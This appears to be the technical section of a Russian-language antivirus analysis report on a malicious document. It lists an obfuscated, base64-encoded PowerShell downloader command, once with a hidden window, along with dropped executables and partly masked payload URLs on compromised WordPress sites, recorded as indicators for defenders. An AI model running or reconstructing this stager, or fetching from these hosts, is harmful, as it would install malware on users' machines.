Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEAQQBVAFUAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGYARABRAEIAbwBBACcALAAnADQAJwApADsAJABvAFUAQQBHAEEAUQBBAEEAPQBOAEUAdwAtAGAAbwBgAEIAagBFAEMAVAAgACgAJwBOACcAKwAnAGUAJwArACcAdAAuAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1369985.cvr
- %HOMEPATH%\147.exe
- %HOMEPATH%\147.exe
- 'th####stheory.com':80
- 'st###biemans.nl':80
- 'st###biemans.nl':443
- 'ta##.cba.pl':80
- http://th####stheory.com/wp-admin/t9_p/
- http://st###biemans.nl/wp-content/Ro_S/
- http://ta##.cba.pl/wvvw/KF_r6/
- 'st###biemans.nl':443
- DNS ASK th####stheory.com
- DNS ASK st###biemans.nl
- DNS ASK ba####gsanq9.net
- DNS ASK ta##.cba.pl
- DNS ASK ze###.echoes.co.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEAQQBVAFUAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGYARABRAEIAbwBBACcALAAnADQAJwApADsAJABvAFUAQQBHAEEAUQBBAEEAPQBOAEUAdwAtAGAAbwBgAEIAagBFAEMAVAAgACgAJwBOACcAKwAnAGUAJwArACcAdAAuAF...' (со скрытым окном)